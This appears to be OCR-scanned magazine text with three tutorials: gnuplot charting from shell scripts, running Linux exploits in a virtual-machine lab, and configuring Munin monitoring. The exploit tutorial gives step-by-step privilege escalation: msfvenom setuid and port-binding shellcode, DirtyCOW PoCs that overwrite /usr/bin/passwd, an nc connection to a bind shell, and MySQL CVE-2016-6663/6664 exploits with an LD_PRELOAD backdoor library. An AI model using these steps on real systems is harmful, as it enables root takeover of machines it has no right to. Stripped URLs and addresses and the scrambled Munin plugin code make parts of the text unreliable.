gnuplot> plot sin(x)

Figure 2

Above Setting the grid property enhances diagram output by including a backdrop grid

Off Licence!

gnuplot's name, in fact, is misleading: the product is not distributed under the GPL licence, but uses a different licensing regime which does not permit the redistribution of changed source code packages. Developers must, instead, publish patches that can be applied against an officially released version of the program code.

Entering the command sequence printed leads to a pop-up display showing the contents of Figure 1. While this is not an unattractive option, the product is capable of a lot more. This is accomplished by setting state variables: the gnuplot program, even in interactive mode, is not completely stateless. One way to try this out involves the following command sequence, which is ideally entered right after you've started gnuplot:

gnuplot> set grid
gnuplot> plot sin(x), cos(x)
gnuplot>

When done, you are presented with the output shown in Figure 2. It is obvious that the set grid command motivates the program to display a grid in the background of any rendered diagrams. Be aware that Ctrl+C does not exit the gnuplot application – getting back to the operating system can only be accomplished by entering the quit command followed by the Return key.

You're welcome HERE

Even though running gnuplot directly is a fun way to get some charts on the screen, shell scripts work better if they can control the execution en masse via a set of parameters defined during the creation of the script file. Embedding long sequences of text into shell scripts is best handled via the concept of a here document: it is a set of syntax markups that allow you to embed a long string into a shell script. Start out with the following example that demonstrates its use:

#!/bin/bash
gnuplot <<ENDOFTHISDOC
set terminal wxt
plot sin(x), cos(x)
ENDOFTHISDOC

In Bash, shell scripts containing here documents start out via a specified start-up sequence. This set of characters – in the case of our example, we use ENDOFTHISDOC – must be something that does not occur in the actual textual content found inside your document. Instead, it acts as a delimiter on the other side. In the case of our example, the here document consists of the set terminal and plot commands, which get passed into the main gnuplot invocation via the << operator.

Running the current version of the program leads to unsatisfactory results. The window containing the chart will pop up shortly, only to disappear again afterwards. This stupid behaviour is caused by a little oddity of gnuplot – by default, it removes all chart windows from the screen the moment the main application reaches the end of the script input provided. Fortunately, passing in the -persist parameter allows you to change this behaviour. A working version of our little charting program would look like this:

#!/bin/bash
gnuplot -persist <<ENDOFTHISDOC &
set terminal wxt
plot sin(x), cos(x)
ENDOFTHISDOC

Run this version of the program to find yourself in front of a diagram showing both sine and cosine – an excellent tool for teaching more about trigonometry.
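The real win of driving gnuplot from a here document is that shell variables expand inside it, so one script can chart whatever the surrounding code computes. A small runnable sketch that only generates the gnuplot script as a text file (so it works even where gnuplot is not installed); the variable func and the file name plotjob.gp are made up for the example:

```shell
#!/bin/bash
# Build a gnuplot script from shell parameters via a here document.
func="sin(x)"          # the function to plot, chosen by the shell
outfile="plotjob.gp"   # hypothetical script file name

cat > "$outfile" <<ENDOFTHISDOC
set terminal wxt
set grid
plot $func
ENDOFTHISDOC

cat "$outfile"
# The generated file could then be run with: gnuplot -persist "$outfile"
```

Because $func is expanded by the shell before gnuplot ever sees the script, the same three lines can plot any expression the script computes at runtime.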



Linearise me

In some cases, transforming a set of values into a function is helpful as it allows the creation of more sophisticated models using the additional data generated from the function. This is a highly mathematical topic, which usually requires dedicated study of its own – O'Reilly's book Mastering Algorithms in C contains a pretty good, understandable discussion of the process of polynomial interpolation.



In most cases, the data that needs to be displayed does not take the form of a simple function: it, instead, tends to come as a series of values which must be passed to gnuplot via the corresponding commands. Embedding such information into the script is not particularly satisfactory – creating self-modifying shell scripts is an art of its own, which we cannot discuss in the frame of a single story. Fortunately, gnuplot can also take in plotting data from plain text files. Let us demonstrate this by creating a file called datasource.txt, and by populating it with a bit of data taken from the precious metal powerhouse Kitco:

1  1236.45  18.59
2  1267.5   18.75
3  1281.4   18.81
4  1282.35  18.26
5  1283.05  18.22
6  1302.8   18.3
7  1301     18.07
8  1303.75  18.54
9  1288.45  18.24
10 1272     17.76

A cursory look at the structure of the file reveals that we have three columns: in addition to a handling sequence number, we have both the silver and the gold prices for ten consecutive trading days. Displaying this information in a naïve chart can be accomplished with the following bit of code:

#!/bin/bash
gnuplot -persist <<ENDOFTHISDOC &
set terminal wxt
plot 'datasource.txt' using 1:2, 'datasource.txt' using 1:3 with lines
ENDOFTHISDOC

Here, two things are interesting. First of all, the file name is passed in between single quotes to designate the file in question. Secondly, we specify which column numbers are used as the two variables. As we plan to create one diagram line with gold and one with silver information, two using commands are used that are tied together using the comma operator. When done, run the program – its output will be similar to the one shown in Figure 3.

This is a common problem in diagrams: if the values to be displayed are of significantly differing ranges, the use of a common axis leads to problems. In the case of our diagram, gold price information looks good while the smaller silver price data gets squashed. Fortunately, fixing the problem is really easy: change the here document in order to force gnuplot to use two independent axes:

#!/bin/bash
gnuplot -persist <<ENDOFTHISDOC &
set terminal wxt
plot 'datasource.txt' using 1:2, 'datasource.txt'


Figure 3

Above One axis cannot be used to display two datasets efficiently if their values differ significantly

using 1:3 axes x1y2 with lines
ENDOFTHISDOC

Our example will yield a diagram showing the two price curves in a somewhat sensible format: sadly, axis information is displayed only for the gold price. A long-term mentor of this author – duly equipped with a PhD in physics from one of the most reputable institutes of Austria – once failed the author of this story for a technicality: his diagrams lacked axis descriptions, and thus were "meaningless". While this might seem a bit extreme, adding context to diagrams is helpful as it prevents misinterpretation. As one can imagine, this is easily accomplished in gnuplot via the following modifications:

#!/bin/bash
gnuplot -persist <<ENDOFTHISDOC &
set terminal wxt
set ylabel 'Gold'
set y2label 'Silver'
set xlabel 'Trading days'
set y2tics autofreq
plot 'datasource.txt' using 1:2 axes x1y1, 'datasource.txt' using 1:3 axes x1y2 with lines
ENDOFTHISDOC

We start out by using the xlabel and ylabel commands to assign textual descriptions to the axes. Next, the y2tics attribute is set to autofreq: this instructs gnuplot to find the optimal step values using its internal logic. In addition to that, it also overwrites the default settings: if left to its own devices, gnuplot will display ticks only on the first axis of the diagram. With that, it is time to run our standalone example for one last time. Figure 4 shows what you can expect.

File ahoy!

Displaying diagrams is interesting as long as the shell script is run interactively – if your script runs unattended, it is more useful to create a file which can then be distributed via email or SCP transfer. This can be accomplished by redirecting gnuplot's terminal instance so that it outputs information into a file rather than to a window shown on the frame buffer. Let's try this by modifying the precious metal charting program – a sharply abridged version, omitting the state variable code for brevity, looks like this:

Figure 4 (above): Creating an unambiguous diagram takes but a few commands

#!/bin/bash
gnuplot <<ENDOFTHISDOC &
set terminal png
set output 'goldchart.png'
...
plot 'datasource.txt' using 1:2 axes x1y1 ...
ENDOFTHISDOC

This gnuplot invocation differs from the normal ones in that it first sets the terminal to png, thereby instructing the program to plot to a PNG file. set output is then used to specify the name of the file that is to be generated, after which plotting commands can be issued. When run, the directory containing the shell script will be populated with a graphics file. It can then be forwarded to its final destination using a file transfer command of your choice.

Differing data

Now that you can load a separate data file into gnuplot at runtime, we can change the program's behaviour in order to put out data collected by the main shell script during its execution. One good example of this would be a plot showing ping times to a server – assuming a permanently working network connection, we can expect the sending of ten packets to take about ten seconds. This makes ping an ideal candidate for the final diagramming application of this tutorial – showing a historical trend of connection reliability over time gives an additional layer of meaning to your data. Sadly, the output of ping is not directly usable: gnuplot expects uniform numeric values, and is unlikely to be able to parse the output directly. Piping can solve this problem – the awk utility allows you to cut out parts of texts easily. For example, the following line would cut out the relevant column:

ping -c 10 | awk -F [=\ ] {'print $(NF-1)'} > pingstore.dat

When run, the file pingstore.dat for this author will contain the following bit of data (the numbers are likely to be different):

root@tamhan-thinkpad:~/Desktop/DeadStuff/2016Nov/AprilBash8# cat pingstore.dat
of
50.7
50.3
204
53.5
50.4
51.0
50.9
57.8
50.0
53.0

Fortunately, this problem can be solved via grep. When invoked as shown, the program will limit its output to purely numeric data:

ping -c 10 | awk -F [=\ ] {'print $(NF-1)'} | grep -E "[0-9]" > pingstore.dat

With that, but one problem remains: graphing the content of the .dat file:

#!/bin/bash
ping -c 10 | awk -F [=\ ] {'print $(NF-1)'} | grep -E "[0-9]" > pingstore.dat
gnuplot -persist <<ENDOFTHISDOC &
plot 'pingstore.dat' with lines
ENDOFTHISDOC

Our last example is special in that it simply provides gnuplot with the pingstore file and instructs it to use lines for the drawing operation. gnuplot's internal algorithms will proceed to generate a numerical sequence for the X axis, thereby ensuring that the diagram looks great. An entire book has been written about gnuplot – anyone who does a lot of diagramming should definitely spend a bit of time with the product's man page. For the average user, however, the instructions discussed in this story are more than enough. And with that, our trip through the realm of shell scripting has come to an end. Even though we covered an amazing amount of ground, this is, by far, not everything that can be said about shell scripts. Should you find yourself performing any kind of task over and over again, you should definitely consider looking for a shell script to handle it instead – thanks to the openness and chattiness of UNIX administrators, a simple Google search is likely to yield more results than you could have imagined in your wildest dreams.
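As a closing aside, the awk and grep stages of the ping pipeline can be sanity-checked offline. The two canned lines below merely imitate ping's output format (the host name and timing are invented), so no network access is needed:

```shell
#!/bin/sh
# Sanity-check the field-extraction stage against canned lines that
# imitate ping's output. The first line yields the time value; the
# second (summary-style) line yields the word "time", which the
# grep stage then filters out.
samples='64 bytes from host: icmp_seq=1 ttl=57 time=50.7 ms
10 packets transmitted, 10 received, 0% packet loss, time 9012ms'

times=$(printf '%s\n' "$samples" |
    awk -F '[= ]' '{print $(NF-1)}' |
    grep -E '[0-9]')
echo "$times"    # only the numeric value survives
```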




Analyse, adjust and run exploits in a controlled environment

Running exploits out-of-the-box is a perilous business: it can lead to a total system crash

Toni Castillo Girona holds a bachelor's degree in Software Engineering and works as an ICT research support expert at a public university in Catalonia, Spain. He writes regularly about GNU/Linux on his blog.

Resources
WebSecurity Dojo installation
Kali Linux installation
MySQL CVE-2016-6663
MySQL CVE-2016-6664
MySQL system crash video

Above: By executing the ptrace-based exploit, we can overwrite /usr/bin/passwd and gain a root shell

Quite a few dangerous vulnerabilities have popped up lately, most of them exploitable by executing different Proof of Concept (PoC) scripts. Some of them even come with catchy names (e.g. DirtyCOW). Sometimes these PoCs work out-of-the-box, but sometimes they don't. If a PoC does not yield the expected result, that does not necessarily mean it has not affected the system in some way. If you execute an exploit and it does not work, it may be because that particular system is not vulnerable, or because the PoC needs to be adjusted. Worst-case scenario: the exploit damages the system. This is why you need to analyse what the exploit really does, understand the vulnerability it is based on, and execute it in a controlled environment (i.e. a virtual machine). This tutorial will give you a general understanding of exploits by playing with three of the latest ones out there (as of this writing): CVE-2016-5195, CVE-2016-6663 and CVE-2016-6664, along with a brief step-by-step guide to shellcode. Exploits are coded in all sorts of programming languages: C, Perl, Python, Ruby… even in Bash. It is a good idea to analyse a particular exploit and then re-code it in your preferred language to prove that you have understood what it does.

Prepare your test lab

First things first: you don't want to go around executing exploits against a real computer! You need to set up a test lab first. To follow this tutorial, you have to install two virtual machines (VMs): WebSecurity Dojo 2.0 and Kali Linux (see Resources). Once both VMs are up and running, open a new shell in each of them and read on!

Generate shellcode

Shellcode is commonly found in exploits. It is machine code that is delivered (at some point, and by using different techniques) to the vulnerable application. You can write shellcode from scratch or by using msfvenom, a tool within the Metasploit Framework. The WebSecurity Dojo architecture is x86, so let's generate an ELF32 binary that will spawn a new shell. Type this in your Kali Linux terminal:

msfvenom -p linux/x86/exec -a x86 CMD=/bin/bash PrependSetuid=True -f elf > myshell

Try it; copy the file to your WebSecurity Dojo VM:


Ethical hacking

The information in this tutorial is for security testing purposes only. It is illegal to use these techniques on any computer, server or domain that you do not own or have admin responsibility for!

scp myshell dojo@YOUR_DOJO_IP:

From within WebSecurity Dojo, you need to type these commands to change the owner and finally set the execution and SUID bits on myshell:

sudo chown root:root myshell
sudo chmod 4755 myshell

Execute it as user dojo and you will get a new root shell:

./myshell
bash-4.2#

Convert the shellcode to a C-char buffer (hex op-codes)

You can tell msfvenom to output the payload using different formats. By using elf as before, you are in fact generating a Linux executable that can be run out-of-the-box. You can play with different formats and see what happens (-f). It is common to embed shellcode inside a PoC script. This PoC can be written in C, Python, or whatever. So you need to adjust the payload format accordingly so it fits nicely within your PoC. Let's imagine you want all the bytes from our previous payload to be converted into a C-char buffer. To do so, type this in WebSecurity Dojo:

xxd -i myshell

A byte-by-byte representation of myshell will be output as a C-char array along with its length:

unsigned char myshell[] = {
  0x7f, 0x45, 0x4c, 0x46, 0x01...
};
unsigned int myshell_len = 136;
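xxd ships with vim and may not be present on a minimal system; as a fallback, POSIX od can produce the same raw hex bytes that xxd -i wraps in C array syntax. The two-byte demo file here is invented purely for illustration:

```shell
#!/bin/sh
# Dump a file's bytes as hex using od, which is available on any
# POSIX system. The demo file holds the bytes 'A' (0x41) and 'B'
# (0x42); od prints them without addresses thanks to -A n.
printf 'AB' > demo.bin
hex=$(od -A n -t x1 demo.bin | tr -d ' \n')
echo "$hex"
rm -f demo.bin
```

Wrapping such a dump in C array syntax by hand (0x41, 0x42, ...) gives the same result as xxd -i, minus the generated variable names.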

Convert shellcode to assembly

More often than not you will be using an exploit coded by someone else. This exploit could contain shellcode. You need to understand the shellcode before running it! Go to Kali Linux and generate this new shellcode in C format:

msfvenom -p linux/x86/exec -a x86 CMD=/bin/bash PrependSetuid=True -f c > myshell

Now open your favourite ASCII editor and create a new C source file. Write this down (replace the placeholder with the output of the previous command):

#include <stdio.h>

<PASTE_THE_SHELL_CODE_HERE>

void main(int argc, char **argv) {
}

Save it as exploit.c. Compile it and then open the binary within a gdb session:

gcc exploit.c -o exploit
gdb -q exploit

The shellcode will be located at the address pointed to by buf[]. Use the disassemble command in gdb with this particular address to obtain the exploit code:

(gdb) disass &buf
0x0804a040 <+0>:  xor   %ebx,%ebx
0x0804a042 <+2>:  push  $0x17
0x0804a044 <+4>:  pop   %eax
0x0804a045 <+5>:  int   $0x80
...

Because &buf points to a bunch of op-codes, gdb has no trouble at all in disassembling them!

Overwrite files with DirtyCOW

DirtyCOW is a kernel race condition bug that allows any non-privileged user to write to any read-only file (even those that belong to other users, such as root). It can therefore lead to privilege escalation by overwriting SUID root binaries. WebSecurity Dojo 2.0 is vulnerable to DirtyCOW. Let's play with this bug; download your first exploit using WebSecurity Dojo:

wget -no-check-certificate https://raw. master/dirtyc0w.c

This exploit has been coded in C, therefore you have to compile it:

gcc dirtyc0w.c -o dirtyc0w -pthread

Now, take a snapshot of your VM before executing the exploit by pressing right-Ctrl+T; this way, if something goes wrong, you will be able to recover the previous VM state. This PoC will allow you to write a string to a file owned by root for which you have read-only permission. First, create the file and put some text in it:

sudo echo "Root file" > test
sudo chmod 0404 test

Now, run the exploit:

./dirtyc0w test "HELLO"
...
procselfmem -100000000

If you read the file again, you will see that the exploit has failed. Indeed, the contents of test have not been altered at all. The exploit output itself pinpoints where the error could be: procselfmem -100000000. Using your favourite ASCII editor, open the exploit source code and look for the procselfmem string. The code belongs to one of the two threads of the exploit, procselfmemThread:

1 for(i=0;i<100000000;i++){
2   lseek(f,(uintptr_t) map,SEEK_SET);
3   c+=write(f,str,strlen(str));
4 }
printf("procselfmem %d\n\n", c);

The idea behind DirtyCOW is to trigger a race condition between two threads: one calling madvise() and the other writing over and over to the file mapped into the process address space via /proc/self/mem. As the previous output implies, a negative number means that every single call to the write function has failed (line 3). In other words, you are apparently not allowed to write to /proc/self/mem. However, there is another way to write to a process address space: enter ptrace()! Now let's try the second PoC; download it first:

wget -no-check-certificate https://raw. master/pokemon.c

Compile it:

gcc -pthread pokemon.c -o pokemon

Try to overwrite test once again:

./pokemon test HELLO

Finally, read the test file and be amazed:

cat test
HELLOfile

Looking for SUID root binaries
Whenever trying to escalate privileges (as seen in this tutorial), it is common to look for SUID root files that could be used to achieve this goal. You can rely on the old find command to list all the SUID root files on your system. Type this in a new terminal: find / -xdev -user root \( -perm -4000 -o -perm -2000 \)

This time it has worked. But why? We were not able to write to /proc/self/mem directly, so the new exploit uses a call to ptrace to achieve the same goal. Instead of having a second thread



Tools for privilege escalation
If you have local access to a computer, you can use plenty of tools to look for potentially insecure file permissions (SUID root, world-writable), misconfiguration of some system services, weak passwords, and so on. Go Google their names: LinEnum, unix-privesc-check, Lynis… Have fun!


calling write(), we now have a second thread calling ptrace to write the payload piece by piece (lines 4-6) to the address where a copy of test is mapped:

1 for(i=0;i<10000/l;i++)
2   for(o=0;o<l;o++)
3     for(u=0;u<10000;u++)
4       c+=ptrace(PTRACE_POKETEXT,pid,
5         map+o,
6         *((long*)(argv[2]+o)));

The way this exploit is written follows the standard approach for debugging a child process from its parent by means of calling fork() and ptrace(PTRACE_TRACEME) (see Resources). Exploiting this bug allows us to overwrite files but not to append data to them.
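The find-based SUID hunt from the boxout can be rehearsed safely against a scratch directory instead of the whole filesystem (the -user root test is dropped here because the demo file belongs to the current user):

```shell
#!/bin/sh
# Rehearse the SUID-hunting find predicate in a throwaway directory.
# One file gets the SUID bit, the other does not; only the former
# should be reported.
dir=$(mktemp -d)
touch "$dir/suid-demo" "$dir/plain"
chmod 4755 "$dir/suid-demo"   # set the SUID bit on one file only

# Same permission predicate as the boxout, scoped to the scratch dir:
found=$(find "$dir" \( -perm -4000 -o -perm -2000 \))
echo "$found"
rm -rf "$dir"
```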

Gain a root shell with DirtyCOW

If you combine what you have learned so far about shellcode with the ptrace technique, you can overwrite any file with shellcode. If the file you are overwriting is SUID root, you will be able to spawn a root shell. Go get the next exploit:

wget -O c0w.c

Compile it and execute it:

gcc c0w.c -pthread -o c0w ; ./c0w

This exploit makes a copy of /usr/bin/passwd to /tmp/bak and then overwrites the original with the shellcode you generated using msfvenom. As a result, as soon as any user executes the command passwd, a root shell will be spawned. Try it:

~$ passwd
Segmentation fault

Oops! Depending on your VM's capabilities, you could be presented with a root shell instead of a segfault. Why the segfault? Remember that DirtyCOW is a race condition bug. You have two threads running on the same computer. If madvise() finishes before the main process calling ptrace() has written every single byte of the shellcode to the address where a copy of passwd is located, the ELF file will be corrupted. In this case you have to increase the number of iterations for the madvise() thread: change the value of the i variable to something greater, say 900000000 (line 3), then re-compile the exploit and try again (don't forget to restore the original passwd file from /tmp/bak first):

sudo cp /tmp/bak /usr/bin/passwd
./c0w
passwd
root@dojo2:/home/dojo# whoami
root

How to overwrite passwd using a port-binding shellcode

Now that you are comfortable enough with this PoC, let's change the shellcode so that we can connect remotely to the server as soon as passwd is executed. Go back to your Kali Linux VM and generate a new ELF32 binary that will listen on TCP port 8080, spawning a root shell as soon as a connection is made (this is known as port-binding shellcode):

msfvenom -p linux/x86/shell_bind_tcp -a x86 LPORT=8080 -f elf | xxd -i > payload

Replace the bytes of the shell_code[] buffer inside c0w.c in WebSecurity Dojo with these new ones. Because the shellcode length is different, don't forget to change sc_len too:

unsigned int sc_len = 162;

Recompile the exploit and run it; then execute passwd:

passwd&

Go back to your Kali VM and use netcat to connect to WebSecurity Dojo:

nc YOUR_DOJO_IP 8080

You are now connected to the VM remotely. Type the command whoami to find out if you are, indeed, root:

whoami
root

Escalate privileges in MySQL

It turns out that WebSecurity Dojo is also vulnerable to the latest MySQL CVEs. Download the first exploit:

wget --no-check-certificate -O 40678.c

Install the MySQL client libraries and compile the exploit:

sudo apt-get install libmysqlclient-dev
gcc 40678.c -lmysqlclient -I/usr/include/mysql -o 40678

This exploit gains a mysql-suid shell when executed locally on a vulnerable MySQL version. In order to exploit it, you need some valid database credentials first. Create a new database user with some privileges on the DVWA database:

mysql -u root -p
mysql> use dvwa;
mysql> GRANT CREATE,SELECT,INSERT,DROP ON dvwa.* TO attacker@localhost IDENTIFIED BY 'password';
mysql> exit

Use these credentials to run the first exploit:

./40678 attacker password localhost dvwa
[+] Bingo! Race won (took 4 tries)
[+] Spawning the mysql SUID shell now

mysql_suid_shell.MYD-4.2$

You will be presented with a shell; first of all, check that you have obtained a mysql shell by issuing the whoami command:

mysql_suid_shell.MYD-4.2$ whoami
mysql

From here you can escalate privileges even further by exploiting either CVE-2016-6662 or CVE-2016-6664. Let's try the second one. Open a new terminal in your WebSecurity Dojo VM and download the second exploit:

wget --no-check-certificate -O

This time it is a shell script written in Bash. Set its execution bit first:

chmod +x

If you execute the script you will get an error:

./ : invalid option

Fix it with the dos2unix command:

sudo apt-get install dos2unix
dos2unix

This new technique can gain root access by diverting the MySQL error log file to /etc/, then replacing its contents with a malicious library (generated and compiled within the Bash script). This library will then be preloaded by the linker, thus replacing the call to geteuid() with this malicious one:

1 uid_t geteuid(void) {
2   static uid_t (*old_geteuid)();
3   old_geteuid = dlsym(RTLD_NEXT, "geteuid");
4   if ( old_geteuid() == 0 ) {
5     chown("$BACKDOORPATH", 0, 0);
6     chmod("$BACKDOORPATH", 04777);
7   }
8   return old_geteuid();
9 }

This will make a copy of $BACKDOORPATH (i.e. /bin/bash) SUID root. For this to work, mysqld_safe must be running. Edit /etc/init/mysql.conf and make sure mysqld_safe is executed instead of mysqld:

exec /usr/bin/mysqld_safe

Finally, edit /etc/mysql/conf.d/mysqld_safe_syslog.cnf and set the path for error.log. Then let's start afresh: stop the service, delete the error log file and finally start MySQL again:

service mysql stop
rm -rf /var/log/mysql/error.log
service mysql start

Execute the second exploit from within the MySQL shell:

mysql_suid_shell.MYD-4.2$ ./ /var/log/mysql/error.log
...
[+] Waiting for MySQL to re-open the logs/MySQL service restart...
Do you want to kill mysqld process to instantly get root? :) ? [y/n]

At this point, if you press y and then Enter, the script will perform a killall mysqld, thus making mysqld_safe create a new error.log file from scratch. Because /var/log/mysql/error.log now points to /etc/ (it is a soft link), the error log will be stored in /etc/ (this is known as a symlink attack). The exploit iterates until it sees this file, at which point it tries to add the malicious library to it (line 4) and then delete the $ERRORLOG file (line 5):

1 while :; do
2   sleep 0.1
3   if [ -f /etc/ ]; then
4     echo $PRIVESCLIB > /etc/
5     rm -f $ERRORLOG
6     break;
7   fi
8 done

Depending on how fast your VM is, you may or may not be successful in executing this exploit out-of-the-box. The worst-case scenario is that /etc/ is temporarily owned by root until mysqld_safe executes chown (thus changing the ownership of /etc/ to mysql). If the exploit tries to overwrite /etc/ at that moment, it will fail (the exploit runs as mysql). The exploit will continue its execution until its very last line. What we will have by then is a few MySQL error log entries in /etc/, and because this file is system-wide, every single binary that we try to execute afterwards will complain about not being able to pre-load a bunch of unknown objects. If a privileged user reboots the computer, a total system crash could happen. One way to fix this is by increasing the sleep parameter, or by making sure the file has been successfully overwritten before breaking the loop and deleting $ERRORLOG (lines 5-7):

4   echo $PRIVESCLIB > /etc/
5   if [ $? -eq 0 ]; then
6     rm -f $ERRORLOG
7     break;
8   fi
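The symlink redirection at the heart of this attack can be reproduced harmlessly in a scratch directory; the file names below are stand-ins, not the ones the exploit uses:

```shell
#!/bin/sh
# Demonstrate symlink-attack mechanics in a throwaway directory:
# whoever writes "to the log" actually writes to the link's target.
dir=$(mktemp -d)
echo "original" > "$dir/target"
ln -s "$dir/target" "$dir/error.log"    # error.log now points at target

echo "injected line" > "$dir/error.log" # write through the symlink
content=$(cat "$dir/target")            # the target received the data
echo "$content"
rm -rf "$dir"
```

This is exactly why a service that re-creates and writes its log file as root must never follow links in attacker-controllable locations.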




Monitor your network with Munin

Learn how to install and configure Munin on a Linux system to monitor network computers

Nitish Tiwari

is a software developer by profession, with a huge interest in Free and Open Source software. As well as serving as community moderator and author for leading FOSS publications, he also helps organisations adopt open source software for their business needs.

Resources
Munin:

A computer network is not complete without a resource-monitoring component. While there is no dearth of such monitoring tools, a tried and tested tool is always better than relatively new ones – especially when it comes to network uptime and reliability. In this tutorial we will take a look at one such reliable networked resource monitoring tool called Munin. It lets you easily monitor the performance of not only your computers, but networks, SANs, applications and various other resources. Written in Perl, Munin is easily extensible and its plugins can be written in any language; you can extend its functionality to monitor specific resources via Munin plugins. Architecturally, Munin has a master/node design where the master connects to all the nodes at regular intervals and asks them for data. The master keeps track of the incoming data and any changes therein and serves this information to the end user via a web-based interface. Munin is available for almost all the major Linux distributions, including Debian, Ubuntu, Fedora and Red Hat among others. In this tutorial, we'll see how to install and get started with Munin, followed by how to configure it in a network. We'll also take a look at some of the interesting Munin plugins and see how to write your own.



Install Munin

As Munin is based on a master/node architecture, you'll need to choose the software package to be installed based on the role the machine is going to play. For example, if a machine is going to serve as the master, you need to install the munin-master package on that machine. By master, we mean the machine that is going to collect data from all nodes and serve the results to the end users. The munin-master runs munin-httpd, a basic webserver that provides the Munin web interface on port 4948/tcp. If you're just starting with Munin or have just a few nodes in your network, it should be enough to install munin-master on one machine. On all the other machines in the network (that are going to be monitored), you need to install the munin-node package. We have taken Ubuntu 16.04 as the host system for this tutorial. To install the munin-master package, type the following:

$ sudo apt-get install munin

Right: The Munin monitoring home page on a Munin master system. The top-left corner shows the possible problems in different categories

Similarly, you can install the munin-node package by typing:

$ sudo apt-get install munin-node


Munin master configuration

Once you have both the master and node packages installed on the relevant machines, you’ll need to configure them so that they can talk to each other. Additionally, Munin master needs to have the web server configured to be able to serve network status via webpages. All the configuration files are present in the folder /etc/munin. Let’s first configure Munin master. To start with, open the configuration file like this:

$ cd /etc/munin/
$ sudo nano munin.conf

Then look for the lines starting with dbdir. This section defines the directories that store various Munin master files: dbdir stores all of the rrd files containing the actual monitoring information, htmldir stores the images and site files, logdir maintains the logs, rundir holds the state files, and tmpldir is the location for the HTML templates.


Munin Node for Windows
Munin Node for Windows, i.e. munin-node-win32, is a Windows client for the Munin monitoring system. It is written in C++, with most plugins built into the executable. This is different from the standard munin-node client, which only uses external plugins written as shell and Perl scripts. The configuration file munin-node.ini uses the standard INI file format.

Uncomment all these folder paths by removing the preceding # sign. Also, be sure to change the htmldir from /var/cache/munin/www to the actual web directory as per the web server configuration. We have used the path /var/www/munin. Next, look for the first host tree. It defines how to access and monitor the host machine. It should read:

[localhost.localdomain]
address
use_node_name yes

Change the name of that tree to one that uniquely identifies the server. This is the name that will be displayed in the Munin web interface. Then you'll need to add all the nodes you'd like to monitor in one of these formats. For example, add a node's IPv4 address using this format:

[]
address

If you have DNS configured, you can also use the FQDN of the node instead of its IP address:

[]
address

Munin also supports IPv6, so you can add a node's IPv6 address in the format below:

[]
address 2001:db8::de:caf:bad

Munin master web server configuration

Within the same /etc/munin directory, the next file we'll be modifying is apache.conf, Munin's Apache configuration file. This file is sym-linked to /etc/apache2/conf-available/munin.conf, which, in turn, is sym-linked to /etc/apache2/conf-enabled/munin.conf. Open the file to allow editing:

$ sudo nano apache.conf

At the very top of the file, modify the first line to /var/www/munin, the same as the htmldir path you specified in munin.conf. Next, look for the Directory section, and change the directory to /var/www/munin. Also comment out the first four lines and then add two new directives so that it reads:

<Directory /var/www/munin>
  #Order allow,deny
  #Allow from localhost ::1
  #Options None
  Require all granted
  Options FollowSymLinks SymLinksIfOwnerMatch
  .......
</Directory>

You need to change the last and second-to-last Location sections in a similar manner to finish the configuration. Finally, restart the Apache and munin-node services. You should then be able to access Munin at http://localhost/munin.


Adding nodes

To configure Munin nodes, you'll need to edit the /etc/munin/munin-node.conf file. The first step is to allow access for the master, so it can query the node. A Munin node listens on all interfaces by default, but because of a restrictive access list, you need to add your master's IP address for the monitoring to work. The 'cidr_allow', 'cidr_deny', 'allow' and 'deny' statements can be used to list the master's IP address. With cidr_allow you can use the following syntax:





cidr_allow

Alternatively, allow uses regular expression matching against the client IP address:

allow '^127.'
allow '^$'

The next step in configuring the Munin node is to decide which plugins to use. Once you have decided, just add the plugin files to the directory /etc/munin/plugins; the Munin node runs all plugins present in that directory. Note that Munin has a plug-and-play architecture with no restrictions on how and when a node can be added to the network. So, whenever you need to add a new node to your existing network (that is being monitored by Munin), you can simply install the Munin node package using the command mentioned earlier and allow access to the Munin master using the configuration explained above. This ensures the new node is monitored by Munin.

Monitor hosts that aren't directly reachable

There are a number of situations where you'd like to run a Munin node on hosts not directly available to the Munin server. For example, consider a scenario where a UNIX server sits between the Munin server and one or more Munin nodes. The server in between reaches both the Munin server and the Munin node, but the Munin server does not reach the Munin node or vice versa. There are various approaches to handle such scenarios; we'll look at SSH tunnelling. With SSH tunnelling only one SSH connection is required, even if you need to reach several hosts on the other side. The Munin server can listen on different ports on the localhost interface and track the nodes. To enable tracking via SSH tunnelling you need to add a node like this:

[ssh-node]
address
port 5050

Then establish an SSH connection using the following:

$ ssh -L 5050:localhost:4949 -f -N -i keyfile user@ssh-node

This will establish a tunnel between TCP port 5050 on the calling machine and port 4949 on the called machine. It will also send SSH to the background, after possibly asking for a passphrase.


Munin plugins

A Munin plugin is a simple executable invoked in a command line environment, whose role is to gather a set of facts on a host and present them in a format Munin can use. A plugin is usually called without any arguments. In this circumstance, the plugin returns the data in a key value format. For example, the ‘load’ plugin, which comes as standard with Munin, will output the current system load:

$ munin-run load
load.value 0.03

The default directory for plugins is /usr/share/munin/plugins/. You can activate a plugin by creating a symbolic link in the servicedir (usually /etc/munin/plugins/ for a package installation of Munin) and restarting the Munin node. The Munin installation procedure uses the utility munin-node-configure to check which plugins are suitable for your node and to create the links automatically. It is called every time the system configuration changes (services, hardware, etc.) on the node and it will adjust the collection of plugins accordingly.


Munin plugin invocation

By default, about a dozen plugins are installed and active. In its most common form, a plugin is a small Perl program or shell script. The plugins are run by munin-node, and they are invoked when it is successfully contacted by the munin master. When this happens, munin-node runs each plugin twice – once with the argument config to get the graph configuration, and once again with no argument to get the graph data. Here is how the two invocations are handled by a plugin.


When a plugin is invoked with the config argument it is expected to output configuration information for the graph it supports. This output consists of a number of attributes divided into two sets – global attributes and a set of data source-specific attributes. You can check out the full attribute list in the Munin plugin reference (reference/plugin.html). However, when the node receives a fetch command for a plugin, the plugin is invoked without any arguments and is expected to emit one or more field.value attribute pairs, one for each thing the plugin observes as defined by the config output. The plotting of graphs may be disabled by the config output.


graph_vlabel load load.label load

Munin alarms

EOM exit 0;; esac printf "load.value " cut -d' ' -f2 /proc/loadavg

Sample Munin plugin

Let’s create a sample Munin plugin. We’ll take the example of the Load Average plugin and write it in shell script. In this plugin we want to be able to track a node’s overall average load. There is a Linux file that has the info: /proc/ loadavg. So, let us first read the file and format the output:

$ cut -d' ' -f1 /proc/loadavg 0.09 Also, Munin wants the value in a more structured form, so let’s structure it further:

# printf "load.value "; cut -d' ' -f2 /proc/ loadavg load.value 0.06 Here the load is called the field or field name, the value is the attribute, and the number is the value. The next step is to make sure the plugin accommodates the mandatory requirement of responding with graph-related details when called with the config argument. Minimal output should look like this:


Munin buddyinfo plugin

